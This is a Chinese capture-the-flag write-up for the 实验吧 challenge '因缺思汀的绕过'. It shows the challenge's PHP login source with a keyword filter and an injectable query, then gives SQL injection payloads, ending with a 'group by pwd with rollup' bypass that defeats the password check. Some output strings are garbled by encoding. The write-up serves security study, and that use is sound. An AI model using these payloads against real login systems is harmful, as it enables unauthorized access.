CTF实验吧 因缺思汀的绕过
题目
打开链接
查看源码,发现source.txt文件
打开链接
将代码注释,更易大家明白
<?php
error_reporting(0); //关闭错误报告
if (!isset($_POST['uname']) || !isset($_POST['pwd'])) {
echo '<form action="" method="post">'."<br/>";
echo '<input name="uname" type="text"/>'."<br/>";
echo '<input name="pwd" type="text"/>'."<br/>";
echo '<input type="submit" />'."<br/>";
echo '</form>'."<br/>";
echo '<!--source: source.txt-->'."<br/>";
die;
}
function AttackFilter($StrKey,$StrValue,$ArrReq){ //过滤字符函数
if (is_array($StrValue)){ //检测变量是否是数组
$StrValue=implode($StrValue); //返回由数组组成的字符串
}
if (preg_match("/".$ArrReq."/is",$StrValue)==1){ //i修正符不区分大小写,s圆点.匹配换行符
print "姘村彲杞借垷锛屼害鍙禌鑹囷紒"; //匹配成功一次输出XXXX
exit(); //正常退出
}
}
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)"; //择一匹配(被过滤的字符)
foreach($_POST as $key=>$value){ //遍历数组
AttackFilter($key,$value,$filter);
}
$con = mysql_connect("XXXXXX","XXXXXX","XXXXXX"); //接数据库
if (!$con){ //检测连接
die('Could not connect: ' . mysql_error());
}
$db="XXXXXX";
mysql_select_db($db, $con); //更改连接默认的数据库
$sql="SELECT * FROM interest WHERE uname = '{$_POST['uname']}'";
$query = mysql_query($sql); //向mysql发送连接查询命令
if (mysql_num_rows($query) == 1) { //返回结果集中行的数量
$key = mysql_fetch_array($query); //取结果集中一行做数组
if($key['pwd'] == $_POST['pwd']) {
print "CTF{XXXXXX}";
}else{
print "浜﹀彲璧涜墖锛�";
}
}else{
print "涓€棰楄禌鑹囷紒";
}
mysql_close($con); 关闭数据库
?>
通过源代码分析可知,做到以下三点就能得到Flag
1.注入查询的的不能含有$filter中的字符
2.查询结果返回一行
3.此行中的pwd=$_POST[‘pwd’]
使用以下代码可知道有几条数据
1' or 1 limit 1 offset 0-- -
1' or 1 limit 1 offset 1-- -
- 返回“浜﹀彲璧涜墖锛�”
1' or 1 limit 1 offset 2-- -
返回”涓€棰楄禌鑹囷紒”;
说明有两条数据
然后用以下代码可绕过第3点
1' or 1 group by pwd with rollup limit 1 offset 2-- -